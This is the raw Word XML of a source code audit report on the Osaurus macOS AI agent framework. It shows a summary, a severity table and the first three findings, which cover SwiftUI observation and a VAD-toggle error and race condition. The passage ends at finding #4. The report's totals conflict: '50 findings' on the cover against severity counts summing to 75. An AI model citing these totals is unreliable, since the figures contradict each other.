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B4F72"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">OSAURUS FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E86C1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Source Code Audit Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B4F72" w:sz="6" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">April 12, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive audit covering 440+ Swift source files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">across architecture, security, memory, services, plugins, UI, and CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">50 findings  ·  18 Critical  ·  22 High  ·  25 Medium  ·  10 Low</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This report presents a comprehensive source code audit of the Osaurus macOS AI agent framework, covering architecture, security, memory systems, service layer, plugin/sandbox infrastructure, UI patterns, and build/CI configuration. The audit examined over 440 Swift source files across OsaurusCore, OsaurusCLI, and the SwiftUI application layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The framework demonstrates strong architectural foundations with a layered services model, sophisticated cryptographic identity system, and thoughtful plugin sandboxing. However, the audit identified 75 specific issues across 7 audit domains, including several critical security vulnerabilities and data integrity risks that warrant immediate attention.</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Count</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Domains Affected</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2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">All 7 domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">6 domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Next 2 sprints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F39C12"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">All 7 domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">4 domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:left w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:bottom w:val="single" w:color="BDC3C7" w:sz="1"/>
              <w:right w:val="single" w:color="BDC3C7" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="50"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="50"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Opportunistic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Core Architecture &amp; Entry Points</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The application entry point, Package.swift manifests, CLI entry, and Makefile were audited for structural issues, error handling, and build reliability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[CRITICAL] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing @ObservedObject on Managers</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App/osaurus/osaurusApp.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 15-19)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">ScheduleManager and WatcherManager lack @ObservedObject wrappers despite being used in SwiftUI views. Changes to these managers will not trigger view updates, causing silent UI desynchronization.</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Add @ObservedObject to all manager properties used in SwiftUI view bodies. Verify each manager conforms to ObservableObject.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Silent Error Handling in VAD Toggle</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App/osaurus/osaurusApp.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 278-290)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">When vadService.start() fails, the error is caught and the state is silently rolled back with no logging or user feedback. Users see VAD disabled with no explanation.</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Log the error, show a user-facing toast/alert explaining the failure, and include diagnostic info in the log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="F39C12" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#3  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F39C12"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Race Condition in VAD Toggle</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App/osaurus/osaurusApp.swift</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  (lines 270-292)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid double-toggling creates a race between config persistence and async start/stop operations. The second toggle may read stale config state.</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Persist config synchronously before launching async Task. Use a serial gate (Bool flag or actor) to prevent concurrent toggle execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E67E22" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">#4  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
